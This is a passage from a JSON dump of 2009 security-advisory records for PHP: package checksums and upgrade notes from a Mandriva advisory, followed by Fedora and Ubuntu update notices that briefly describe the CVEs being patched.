2009.0/i586/php-recode-5.2.6-18.3mdv2009.0.i586.rpm\r\n ebb6595e5c1b613373f87056dc82ee4f 2009.0/i586/php-session-5.2.6-18.3mdv2009.0.i586.rpm\r\n ccebafe18a9cd4211ba8fc43c9c8ecf5 2009.0/i586/php-shmop-5.2.6-18.3mdv2009.0.i586.rpm\r\n 1ecbe12b56c50787db123b8e73b4ad9f 2009.0/i586/php-snmp-5.2.6-18.3mdv2009.0.i586.rpm\r\n dc0d6dc9c18971e7ae032f5038817d09 2009.0/i586/php-soap-5.2.6-18.3mdv2009.0.i586.rpm\r\n 2160d4f86d28c3ac1886a4b6a0b23545 2009.0/i586/php-sockets-5.2.6-18.3mdv2009.0.i586.rpm\r\n f72ee93391f9e3dface795d5dbfeda99 2009.0/i586/php-sqlite-5.2.6-18.3mdv2009.0.i586.rpm\r\n 60aeeb93274532fe224c5beb801df15d 2009.0/i586/php-sybase-5.2.6-18.3mdv2009.0.i586.rpm\r\n b3803e6e7914c5912d67bb0e85ae2ead 2009.0/i586/php-sysvmsg-5.2.6-18.3mdv2009.0.i586.rpm\r\n a14394d6fa538fae4d5902560b395a8c 2009.0/i586/php-sysvsem-5.2.6-18.3mdv2009.0.i586.rpm\r\n b7c6414e5144dd7e061068bfd9dd0e54 2009.0/i586/php-sysvshm-5.2.6-18.3mdv2009.0.i586.rpm\r\n 95c53411a670dc52ca68099dd2164b50 2009.0/i586/php-tidy-5.2.6-18.3mdv2009.0.i586.rpm\r\n a3c21fd780e82217173668bd2291030d 2009.0/i586/php-tokenizer-5.2.6-18.3mdv2009.0.i586.rpm\r\n 9fa159c8fb66c6831471ae4d95118b25 2009.0/i586/php-wddx-5.2.6-18.3mdv2009.0.i586.rpm\r\n 57833f2edfb42f0726a52c704c072181 2009.0/i586/php-xml-5.2.6-18.3mdv2009.0.i586.rpm\r\n 940fc7e8b5165331ccb5a7568b6889ff 2009.0/i586/php-xmlreader-5.2.6-18.3mdv2009.0.i586.rpm\r\n b59378dc6a60fb4de45ee899b5732f10 2009.0/i586/php-xmlrpc-5.2.6-18.3mdv2009.0.i586.rpm\r\n 62b83e8ec57ff04fca9bfba5bc32e85d 2009.0/i586/php-xmlwriter-5.2.6-18.3mdv2009.0.i586.rpm\r\n cad6dfc72ba90c1ae1e161560bdfb09c 2009.0/i586/php-xsl-5.2.6-18.3mdv2009.0.i586.rpm\r\n af0f735b6798d0811010dcb4c2a7f81e 2009.0/i586/php-zlib-5.2.6-18.3mdv2009.0.i586.rpm \r\n b20c32eb23068d90025422202af824e5 2009.0/SRPMS/php-5.2.6-18.3mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n 1677f83b6b8861cfe22302cb1575f376 2009.0/x86_64/lib64php5_common5-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 2a9acca7bed660eb110c3b39a8f6f92d 2009.0/x86_64/php-bcmath-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n b724f73dd8313e98c42e9c9dd648627f 2009.0/x86_64/php-bz2-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n e6659ea2a6956e142417839b9559140e 2009.0/x86_64/php-calendar-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 1844e2cf4af9e6d977a5afc205f2917b 2009.0/x86_64/php-cgi-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 515be43d736da244e25adc8a80503bb3 2009.0/x86_64/php-cli-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 77f6e73ba9b06f983c876c7f336a77af 2009.0/x86_64/php-ctype-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n cecdc481b01b009b8e3945c5fe084ca8 2009.0/x86_64/php-curl-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n bd1891c813094860abc8d400d67d8cb0 2009.0/x86_64/php-dba-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 86e7be79c0c028c8099952098ff7471c 2009.0/x86_64/php-dbase-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 9aaeeeaccb645a4808452e5bfa64ec93 2009.0/x86_64/php-devel-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 9bf6f3f9da95b7b4b65d386af9a0cd23 2009.0/x86_64/php-dom-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n c41984bb036e75ed94b1874d9b6ff905 2009.0/x86_64/php-exif-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n ce271b31a4efb0714e32c31c383f0843 2009.0/x86_64/php-fcgi-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 089b190ecd5d8e7a51ef09e3864beee0 2009.0/x86_64/php-filter-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 7dad613fa43a0ef77c81fc5d18e286db 2009.0/x86_64/php-ftp-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 268311d2d48ada48217dd99140f41ee2 2009.0/x86_64/php-gd-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 44cc67db9cd8a7828c28ae25b652df43 2009.0/x86_64/php-gettext-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n d6e5747e71a31bce3e417a19345def04 2009.0/x86_64/php-gmp-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 58042a16dd35d7381426dc3d0c9f0d61 2009.0/x86_64/php-hash-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n dca63f9fca627ed557a1b7d276ccc89f 2009.0/x86_64/php-iconv-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 9da39c2f4505ad84d2addc8aab0be72c 2009.0/x86_64/php-imap-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 0dac93b98b6a8cc22823966d22acae35 2009.0/x86_64/php-json-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n d97297b721af42fcee9079f9da6f00cd 2009.0/x86_64/php-ldap-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 0219f5924cbe290585b2679ce9628965 2009.0/x86_64/php-mbstring-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 8f386693506417ed675afaa93d7a74c0 2009.0/x86_64/php-mcrypt-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n b510504e1fd4395160f511202aa99205 2009.0/x86_64/php-mhash-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 2960e9c3e32b15a0f7e218605e686bcc 2009.0/x86_64/php-mime_magic-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n e4bf93a9d5248d38837ae54dde21a735 2009.0/x86_64/php-ming-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 5a7e875fddbcb69281000b5aed1091e0 2009.0/x86_64/php-mssql-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 0c387ce3b7fde69cf696f0c3adeffacd 2009.0/x86_64/php-mysql-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 013da902befd9a10bc75d31ba33e6ef5 2009.0/x86_64/php-mysqli-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 47f8032d425f6fc6b767d1678058eefe 2009.0/x86_64/php-ncurses-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n c26d02612e36dad905823cee9ce9cb07 2009.0/x86_64/php-odbc-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 4e58eef9892f483a93f3db37d18418d9 2009.0/x86_64/php-openssl-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 42e434e0902918c22b9a3960a4cdd764 2009.0/x86_64/php-pcntl-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 2bdbef90526afc81809431a068098a20 2009.0/x86_64/php-pdo-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 0e4a678e1145a0a5ccefb0db9edcf9eb 2009.0/x86_64/php-pdo_dblib-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 5a7eb81ff57ba8bcdb5fdaca3d3cd9c1 2009.0/x86_64/php-pdo_mysql-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 2807f66c40629a791e10b3de63574814 2009.0/x86_64/php-pdo_odbc-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 99261d1350efacc3d0d3a8c4f570a483 2009.0/x86_64/php-pdo_pgsql-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 4f7c7707b09e5b9d4e25c27466d49f90 2009.0/x86_64/php-pdo_sqlite-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 80c3a1d479bdd704841cc284945d6384 2009.0/x86_64/php-pgsql-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 7672ddc52ae4310c9ca1b56bff611c03 2009.0/x86_64/php-posix-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n ae82652a42301ad71a5d464df80e45d6 2009.0/x86_64/php-pspell-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n b499d861ed3844a0e012f67d44daf2da 2009.0/x86_64/php-readline-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 52dc45f191a6d40c750db1db9192303c 2009.0/x86_64/php-recode-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 2e23b1880a577225e5dcc68ba1487c22 2009.0/x86_64/php-session-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 52e44e76fd66aaaeab22fe50f246a199 2009.0/x86_64/php-shmop-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n fd4b242725e03dd3ed4820455c344518 2009.0/x86_64/php-snmp-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n c500a028138b535784500a43c1d6f384 2009.0/x86_64/php-soap-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n a9a46258d2c05951e0293d7f73e3af92 2009.0/x86_64/php-sockets-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n b57fc84ff9809cc4c6285712ecc9771c 2009.0/x86_64/php-sqlite-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 167b240500b2c53b87d577db2c0702f8 2009.0/x86_64/php-sybase-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 49f0debaea7baf9882233854f86b18c9 2009.0/x86_64/php-sysvmsg-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n aae13312a26200026de7d750f5428d95 2009.0/x86_64/php-sysvsem-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 4b8507a1575955b9091aae3499b6d5d7 2009.0/x86_64/php-sysvshm-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n effb73b94df0ce5e1f029b38d84b2cd0 2009.0/x86_64/php-tidy-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n ef2897836ef8be930dd2dab6b33b251a 2009.0/x86_64/php-tokenizer-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 3edb14da528869d1d9365aa8bfdaac72 2009.0/x86_64/php-wddx-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 34c634415faf8d831b8e75f32ad41538 2009.0/x86_64/php-xml-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 8488eef085ba118e31879e32c39772be 2009.0/x86_64/php-xmlreader-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 74756c45ae06718f6232714b9bab055e 2009.0/x86_64/php-xmlrpc-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 8ac25444070c67fb858ab009d916e9ab 2009.0/x86_64/php-xmlwriter-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 3551f65ddd2c4937a5ec75528f3c1371 2009.0/x86_64/php-xsl-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 2363f602ac7384bc114e3f222fd4eb95 2009.0/x86_64/php-zlib-5.2.6-18.3mdv2009.0.x86_64.rpm \r\n b20c32eb23068d90025422202af824e5 2009.0/SRPMS/php-5.2.6-18.3mdv2009.0.src.rpm\r\n\r\n Corporate 4.0:\r\n d406669c2d2f94a8402343fd6bf0df25 corporate/4.0/i586/libphp5_common5-5.1.6-1.12.20060mlcs4.i586.rpm\r\n 6e585f72c7492e2559d184cdfa55beae corporate/4.0/i586/php-cgi-5.1.6-1.12.20060mlcs4.i586.rpm\r\n d67996d52c00a5b3f4f00d35bdc90188 corporate/4.0/i586/php-cli-5.1.6-1.12.20060mlcs4.i586.rpm\r\n 932c83cf0648bdd9b6f209097550c3c7 corporate/4.0/i586/php-devel-5.1.6-1.12.20060mlcs4.i586.rpm\r\n 92c539bebbb5c3817b7fd78f7517959d corporate/4.0/i586/php-fcgi-5.1.6-1.12.20060mlcs4.i586.rpm\r\n 29216a235396d18c175a3dc022285c37 corporate/4.0/i586/php-mbstring-5.1.6-1.3.20060mlcs4.i586.rpm \r\n 6a538adffaaca7cfa9b4000ead754808 corporate/4.0/SRPMS/php-5.1.6-1.12.20060mlcs4.src.rpm\r\n 1768f58b0dc0aa15a5f4349455cdafc4 corporate/4.0/SRPMS/php-mbstring-5.1.6-1.3.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n e44d2798fe9e1e8f2d3c749c1c5040b6 corporate/4.0/x86_64/lib64php5_common5-5.1.6-1.12.20060mlcs4.x86_64.rpm\r\n 2f5b3ec25a830c7941090b9add54589d corporate/4.0/x86_64/php-cgi-5.1.6-1.12.20060mlcs4.x86_64.rpm\r\n 7b76a96665a14726ef57ea937438dd06 corporate/4.0/x86_64/php-cli-5.1.6-1.12.20060mlcs4.x86_64.rpm\r\n 288cb0f92fa4ca27fe1c2c758895e2fd corporate/4.0/x86_64/php-devel-5.1.6-1.12.20060mlcs4.x86_64.rpm\r\n fd9be7647a87623c051fe257b3b7c784 corporate/4.0/x86_64/php-fcgi-5.1.6-1.12.20060mlcs4.x86_64.rpm\r\n db1f62123547503bf8a4b6252ef495c3 corporate/4.0/x86_64/php-mbstring-5.1.6-1.3.20060mlcs4.x86_64.rpm \r\n 6a538adffaaca7cfa9b4000ead754808 corporate/4.0/SRPMS/php-5.1.6-1.12.20060mlcs4.src.rpm\r\n 1768f58b0dc0aa15a5f4349455cdafc4 corporate/4.0/SRPMS/php-mbstring-5.1.6-1.3.20060mlcs4.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFJsBQ3mqjQ0CJFipgRAh0lAKDQBkTRQ5uoRcqLtSQ0PmRJi4zAPgCg8ndA\r\n/JhqK6p7yB2SxgBbpXjlQMI=\r\n=TtCV\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-03-06T00:00:00", "published": "2009-03-06T00:00:00", "id": "SECURITYVULNS:DOC:21425", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21425", "title": "[ MDVSA-2009:066 ] php", "type": "securityvulns", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-0754"], "description": "mbstring.func_overload setting in .htaccess is applied to all websites.", "edition": 1, "modified": "2009-03-06T00:00:00", "published": "2009-03-06T00:00:00", "id": "SECURITYVULNS:VULN:9711", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9711", "title": "PHP unauthorized access", "type": "securityvulns", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2829", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557", "CVE-2008-5658", "CVE-2008-5814", "CVE-2009-0754", "CVE-2009-1271"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated webpages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2009-05-30T02:34:40", "published": "2009-05-30T02:34:40", "id": "FEDORA:23C2E10F87F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: php-5.2.9-2.fc10", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2829", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557", "CVE-2008-5658", "CVE-2008-5814", "CVE-2009-0754", "CVE-2009-1271"], "description": "ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nerv ous gameplay (tracks almost never exceed one minute). Features: Complex car physics, Challenging \"story mode\", LAN and Internet mode, Live scores, Track editor, Dedicated server with HTTP interface and More than 30 blocks. ", "modified": "2009-05-30T02:34:40", "published": "2009-05-30T02:34:40", "id": "FEDORA:1D64510F80E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: maniadrive-1.2-13.fc10", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2829", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557", "CVE-2008-5658", "CVE-2008-5814", "CVE-2009-0754", "CVE-2009-1271"], "description": "ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nerv ous gameplay (tracks almost never exceed one minute). Features: Complex car physics, Challenging \"story mode\", LAN and Internet mode, Live scores, Track editor, Dedicated server with HTTP interface and More than 30 blocks. ", "modified": "2009-05-30T02:38:47", "published": "2009-05-30T02:38:47", "id": "FEDORA:EE3D810F895", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: maniadrive-1.2-13.fc9", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2829", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557", "CVE-2008-5658", "CVE-2008-5814", "CVE-2009-0754", "CVE-2009-1271"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated webpages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2009-05-30T02:38:47", "published": "2009-05-30T02:38:47", "id": "FEDORA:F3FA410F896", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: php-5.2.9-2.fc9", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-09T00:23:12", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0754", "CVE-2009-1271", "CVE-2008-5814"], "description": "It was discovered that PHP did not sanitize certain error messages when \ndisplay_errors is enabled, which could result in browsers becoming \nvulnerable to cross-site scripting attacks when processing the output. With \ncross-site scripting vulnerabilities, if a user were tricked into viewing \nserver output during a crafted server request, a remote attacker could \nexploit this to modify the contents, or steal confidential data (such as \npasswords), within the same domain. (CVE-2008-5814)\n\nIt was discovered that PHP did not properly handle the \nmbstring.func_overload setting within .htaccess files when using virtual \nhosts. A virtual host administrator could use this flaw to cause settings \nto be applied to other virtual hosts on the same server. (CVE-2009-0754)\n\nIt was discovered that PHP did not properly handle certain malformed \nstrings when being parsed by the json_decode function. A remote attacker \ncould exploit this flaw and cause the PHP server to crash, resulting in a \ndenial of service. This issue only affected Ubuntu 8.04 and 8.10. \n(CVE-2009-1271)", "edition": 5, "modified": "2009-04-20T00:00:00", "published": "2009-04-20T00:00:00", "id": "USN-761-1", "href": "https://ubuntu.com/security/notices/USN-761-1", "title": "PHP vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}
